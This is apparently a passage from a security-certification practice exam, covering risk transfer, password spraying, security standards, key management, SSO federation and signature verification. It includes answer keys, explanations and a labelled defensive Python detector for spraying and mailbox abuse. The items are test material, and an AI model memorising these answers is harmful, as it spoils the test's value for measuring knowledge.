Risk transfer is the correct answer because insurance moves some of the financial burden to the insurer while the company continues the activity.

Why this answer

Purchasing cyber insurance transfers the financial risk of a supplier-related loss to the insurance company. This is a classic risk transfer strategy, where the business does not eliminate or reduce the likelihood of the loss but shifts the financial impact to another party via a contractual agreement.

Exam trap

The trap here is confusing risk transfer (shifting financial impact) with risk mitigation (reducing likelihood or impact), leading candidates to incorrectly select mitigation when insurance is involved.

How to eliminate wrong answers

Option A is wrong because avoidance would mean terminating the supplier relationship entirely, not purchasing insurance. Option B is wrong because mitigation involves implementing controls (e.g., firewalls, redundancy) to reduce the likelihood or impact of a risk, not transferring it via insurance. Option C is wrong because acceptance means acknowledging the risk without taking any action, whereas purchasing insurance is an active treatment.

970
Multi-Select (hard)

A SIEM report shows this sequence over 25 minutes: the same public IP submitted one failed password attempt against 53 different accounts, then one account successfully authenticated, created an inbox forwarding rule, and downloaded hundreds of messages through the web portal. Which two conclusions are best supported? Select two.

Select 2 answers
A. The pattern is consistent with a password spraying attack.
B. The attacker is performing a brute-force attack against one account.
C. The activity is most likely credential stuffing with multiple known password pairs.
D. The successful account is likely compromised and being used for persistence or mailbox abuse.
E. The events primarily indicate a denial-of-service attack against the mail system.
Answers: A, D

One failed attempt across many accounts from one source fits password spraying, which avoids lockouts by keeping per-account attempts low.

Why this answer

Option A is correct because the SIEM shows a single public IP attempting one failed password against 53 different accounts over 25 minutes. This pattern—low-and-slow, one attempt per account—is the hallmark of a password spraying attack, which avoids account lockout thresholds by never hitting the same account repeatedly. The subsequent successful authentication and mailbox abuse confirm the attacker found a weak password for one account.

Exam trap

The trap here is confusing password spraying (one password, many accounts) with brute-force (many passwords, one account) or credential stuffing (many known pairs), leading candidates to pick B or C despite the single-IP, single-attempt-per-account pattern.
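The distinction the trap turns on (one attempt per account across many accounts versus many attempts against one account) is easy to encode as detection logic. The following added example, which is not from the exam page, classifies each source IP from constructed SIEM-style authentication events and then flags accounts where a success from that source was followed by a forwarding rule or bulk download. The event schema, thresholds and sample records are assumptions made for this illustration.

```python
"""Classify login-failure patterns per source IP (password spraying vs
brute force) and flag follow-on mailbox abuse.

Added example, not from the exam page. The event format, thresholds and
sample records are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class Event:
    ts: int          # seconds since the start of the 25-minute window (constructed)
    src_ip: str
    user: str
    action: str      # login_fail | login_ok | forward_rule_created | bulk_download

ABUSE_ACTIONS = {"forward_rule_created", "bulk_download"}

# Constructed sample: one IP makes a single failed attempt against 53 accounts,
# then succeeds on one account, adds a forwarding rule and bulk-downloads mail.
# A second IP hammers a single account, which is brute force, not spraying.
SAMPLE: List[Event] = [Event(i * 20, "198.51.100.23", f"user{i:02d}", "login_fail")
                       for i in range(53)]
SAMPLE += [
    Event(1100, "198.51.100.23", "user17", "login_ok"),
    Event(1160, "198.51.100.23", "user17", "forward_rule_created"),
    Event(1400, "198.51.100.23", "user17", "bulk_download"),
]
SAMPLE += [Event(i * 5, "203.0.113.9", "admin", "login_fail") for i in range(40)]

SPRAY_MIN_ACCOUNTS = 20      # many distinct accounts ...
SPRAY_MAX_PER_ACCOUNT = 2    # ... with very few tries each (stays under lockout)
BRUTE_MIN_ATTEMPTS = 10      # many tries against a single account

def classify_source(events: List[Event]) -> str:
    """Label the failed-login pattern produced by one source IP."""
    fails: Dict[str, int] = defaultdict(int)
    for e in events:
        if e.action == "login_fail":
            fails[e.user] += 1
    if not fails:
        return "none"
    if len(fails) >= SPRAY_MIN_ACCOUNTS and max(fails.values()) <= SPRAY_MAX_PER_ACCOUNT:
        return "password_spraying"
    if len(fails) == 1 and max(fails.values()) >= BRUTE_MIN_ATTEMPTS:
        return "brute_force"
    return "unclassified"

def compromised_accounts(events: List[Event]) -> List[str]:
    """Accounts where a success from this source was followed by mailbox
    abuse (forwarding rule, bulk download): persistence and exfiltration signs."""
    flagged = []
    for user in sorted({e.user for e in events if e.action == "login_ok"}):
        ok_ts = min(e.ts for e in events if e.user == user and e.action == "login_ok")
        abuse = {e.action for e in events
                 if e.user == user and e.ts > ok_ts and e.action in ABUSE_ACTIONS}
        if abuse:
            flagged.append(user)
    return flagged

def analyze(events: List[Event]) -> Dict[str, dict]:
    """Group events by source IP and report the pattern plus affected accounts."""
    by_ip: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        by_ip[e.src_ip].append(e)
    report = {}
    for ip, evs in by_ip.items():
        label = classify_source(evs)
        report[ip] = {
            "pattern": label,
            "distinct_accounts": len({e.user for e in evs if e.action == "login_fail"}),
            "compromised": compromised_accounts(evs) if label != "none" else [],
        }
    return report
```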

971
MCQ (easy)

A security team wants every company laptop to have the same screen-lock timeout, disk encryption setting, and local firewall configuration. Which type of document should define these mandatory settings?

A. A guideline, because employees can decide whether to follow it.
B. A standard, because it specifies mandatory technical requirements.
C. A risk register, because it tracks all security vulnerabilities on laptops.
D. A business impact analysis, because it identifies the most important laptop functions.
Answer: B

A standard is the correct document for mandatory, measurable security settings such as screen-lock timeouts, encryption, and firewall configuration. Standards turn policy intent into specific requirements that can be checked and enforced across devices, which helps keep configurations consistent and easier to audit.

Why this answer

A standard is the correct document type because it defines mandatory technical requirements that must be uniformly enforced across all company laptops. In this scenario, the screen-lock timeout, disk encryption setting (e.g., BitLocker or FileVault), and local firewall configuration (e.g., Windows Defender Firewall with Advanced Security) are non-negotiable controls that must be applied identically to every device to meet security policy. Standards are binding and often reference specific configuration baselines, such as CIS Benchmarks or NIST SP 800-53, ensuring consistent implementation.

Exam trap

The trap here is confusing a standard with a guideline, as many candidates assume any security document is advisory, but standards are explicitly mandatory and enforceable, unlike guidelines which are optional recommendations.

How to eliminate wrong answers

Option A is wrong because a guideline is advisory and suggests best practices that employees may choose to follow or ignore, whereas the scenario requires mandatory settings that must be enforced. Option C is wrong because a risk register is a document that identifies, assesses, and tracks security vulnerabilities and risks, not a document that defines mandatory technical configurations for laptops. Option D is wrong because a business impact analysis (BIA) identifies critical business functions and the impact of their disruption, not the specific technical settings like screen-lock timeout or disk encryption.

972
Multi-Select (hard)

A microservices team stores service private keys inside container images and renews certificates manually once a year. Security wants to reduce damage if a node is compromised and keep certificate trust manageable at scale. Which two changes are the best fit? Select two.

Select 2 answers
A. Store private keys in an HSM-backed secrets manager or equivalent key vault.
B. Embed private keys in the container image so redeployments are simpler.
C. Use an internal CA and automate short-lived certificate renewal.
D. Replace the CA with a self-signed certificate on every node.
E. Convert the key file to base64 before storing it in the image.
Answers: A, C

Keeping private keys out of the image and out of the filesystem reduces the chance that a node compromise exposes long-term secrets. A managed key vault or HSM-backed store is much harder to copy than a baked-in file.

Why this answer

Option A is correct because storing private keys in an HSM-backed secrets manager (e.g., AWS KMS, Azure Key Vault, or HashiCorp Vault with an HSM module) ensures that keys never leave the secure boundary of the HSM. This prevents an attacker who compromises a container or node from extracting the private key material, as the key is used for cryptographic operations via API calls rather than being stored in the filesystem. This directly reduces the blast radius of a node compromise.

Exam trap

The trap here is that candidates often think embedding keys in images is acceptable for simplicity, but the exam tests the principle that private keys must never be stored in the same artifact as the application, and that manual renewal is not scalable for microservices.

973
MCQ (easy)

Employees must sign in to several cloud applications with their corporate account, and terminated users should lose access without separate password resets in each app. What is the best solution?

A. Create a separate local username and password in every cloud application.
B. Use federation with single sign-on from a central identity provider.
C. Store the same shared password in a password manager for all applications.
D. Allow each application to authenticate users only by device MAC address.
Answer: B

Federation with SSO is the best option because employees authenticate once with the corporate identity provider and then access multiple applications through trusted token exchange. This reduces password sprawl, improves user convenience, and makes offboarding faster because disabling the central account removes access across connected services. It also supports stronger controls such as MFA at the identity provider rather than repeating them in every application.

Why this answer

Federation with single sign-on (SSO) from a central identity provider (IdP) allows users to authenticate once using their corporate account, and the IdP issues security tokens (e.g., SAML assertions or OIDC tokens) that each cloud application trusts. When a user is terminated, the administrator disables the account in the IdP, and all applications immediately reject the user's tokens, eliminating the need for separate password resets in each app.

Exam trap

The trap here is that candidates confuse password managers (which store credentials but do not provide centralized revocation) with federation, or they mistakenly think MAC address authentication is viable for cloud applications, when in fact MAC addresses are link-layer identifiers not usable over the internet.

How to eliminate wrong answers

Option A is wrong because creating separate local usernames and passwords in every cloud application violates the requirement for centralized access control and would require manual password resets in each app upon termination. Option C is wrong because storing the same shared password in a password manager does not provide centralized revocation; the password would still need to be changed in every application individually to block access. Option D is wrong because authenticating by device MAC address is not feasible for cloud applications (MAC addresses are not transmitted over the internet) and does not support user-level identity or termination.

974
Multi-Select (hard)

Before installing a vendor patch package on hundreds of endpoints, the security team wants to confirm the file was published by the vendor and was not altered during download. Which two verification steps should the team perform? Select two.

Select 2 answers
A. Verify the package signature with the vendor's public key.
B. Compare the downloaded package hash to the hash in the signed manifest.
C. Decrypt the package with the vendor's private key before installation.
D. Rotate the organization's internal encryption key before downloading.
E. Check only the file timestamp and size on disk.
Answers: A, B

A valid signature proves the package came from the holder of the vendor's private key.

Why this answer

Option A is correct because verifying the package signature with the vendor's public key confirms the package was cryptographically signed by the vendor, proving its authenticity and integrity. This process uses asymmetric cryptography where the vendor signs the package with their private key, and the security team uses the corresponding public key to validate that signature. It ensures the file was not tampered with after signing and that it originated from the claimed vendor.

Exam trap

The trap here is that candidates confuse signature verification with encryption/decryption roles, mistakenly thinking the vendor's private key is used to decrypt the package, when in fact the private key is used to sign and the public key to verify.

975
MCQ (medium)

A legal department needs a contract file that can later prove who signed it and whether the content changed after signing. Which cryptographic mechanism should be used?

A. Digital signature
B. Symmetric encryption
C. Hashing
D. Tokenization
Answer: A

Digital signatures provide tamper detection and signer validation using asymmetric cryptography.

Why this answer

A digital signature provides non-repudiation, ensuring the signer cannot deny signing the document, and integrity, detecting any changes after signing. It uses asymmetric cryptography where the signer's private key creates the signature, and the public key verifies it, making it the correct choice for proving both identity and content integrity.

Exam trap

The trap here is that candidates confuse hashing (which provides integrity) with digital signatures (which provide both integrity and non-repudiation), leading them to pick hashing when the question explicitly requires proof of who signed it.

How to eliminate wrong answers

Option B is wrong because symmetric encryption only provides confidentiality (secrecy) of the contract file, not proof of who signed it or integrity verification; it uses a shared key that cannot uniquely tie a signature to an individual. Option C is wrong because hashing only provides integrity by producing a fixed-size hash of the content, but it does not prove who signed it or offer non-repudiation; anyone can compute the same hash. Option D is wrong because tokenization replaces sensitive data with a non-sensitive placeholder (token) for data protection, typically for payment or PII, and does not provide signing proof or integrity verification.
